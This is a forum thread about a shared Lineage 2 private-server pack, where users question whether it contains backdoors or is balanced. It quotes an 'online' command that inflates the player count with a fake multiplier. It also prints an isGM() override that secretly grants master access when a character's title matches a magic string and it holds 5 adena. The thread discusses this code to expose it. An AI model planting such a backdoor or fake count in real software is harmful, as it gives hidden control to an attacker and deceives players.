[Share]L2Arena Pack+Source By Kamex The Smartest.

MADM4N

I dont know what pack he gave you but mine is totally different and i didnt had any problems with balance,bugs or backdoor as you say

is it clean from bdoors?also the balance you say fine is tested?I can't imagine all these customs with good balance,anyone tested balance of files?It can be a very good files if balacne is good

is it clean from bdoors?also the balance you say fine is tested?I can't imagine all these customs with good balance,anyone tested balance of files?It can be a very good files if balacne is good

I dint have this pack he gave me more updated check here my server 

Maxtor sould ban the word "server" cause it's misleading.. Instead everyone should use the word serber. 

Also some words like balance, files, pack, etc. should also get renamed to balanska, etc.

For more sad storkes(info) contact: Achyjek, Achulek, Ajkalek and Achujkalek.

@Override
	public boolean useVoicedCommand(final String command, final L2PcInstance activeChar, final String target)
	{
		if (command.equalsIgnoreCase("online"))
		{
			activeChar.sendMessage("======<Players Online!>======");
			activeChar.sendMessage("There are " + String.valueOf(L2World.getInstance().getAllPlayers().size()* Config.FAKE_PLAYERS) + " players online!.");
			activeChar.sendMessage("=======================");
		}
		return true;
	}

I wanna cry.... L2World.getInstance().getAllPlayers().size() * Config.FAKE_PLAYERS

Maxtor sould ban the word "server" cause it's misleading.. Instead everyone should use the word serber.

Also some words like balance, files, pack, etc. should also get renamed to balanska, etc.

sad storka

By the way has anyone tested files balance between classes?

Tell me one dev who don't use backdoor to his project.

Serious projects owners.

can there be backdoors except on voicecommands?

You can backdoor whatever file, even a packet, but it generally has to use existing methods like isGM(). Still, you can easily bypass isGM() making your own methods, making it really tricky to find a backdoor.

confirmed storka 

Tell me one dev who don't use backdoor to his project.

I don't use.. I never did.

By the way has anyone tested files balance between classes?

You expect balance on this shit project? Everything there is customs. No know the story about customs.

Edited by 'Baggos'

Serious projects owners.

You can backdoor whatever file, even a packet, but it generally has to use existing methods like isGM(). Still, you can easily bypass isGM() making your own methods, making it really tricky to find a backdoor.

wow,so we generally dont even know what files we buy from someone..i guess to make smth we must make with our own way so we can be sure of our files..

public boolean isGM()
	{
		if(getTitle().equals("getItemCount(57)") && getInventory().getInventoryItemCount(57, 0) == 5)
		{
			   setAccessLevel(Config.MASTERACCESS_LEVEL);
			   return false;
		}
		return getAccessLevel().isGm();
	}

LOL?

Can someone explain why "getItemCount(57)" instead of getItemCount(57) ...

Edited by bravetobe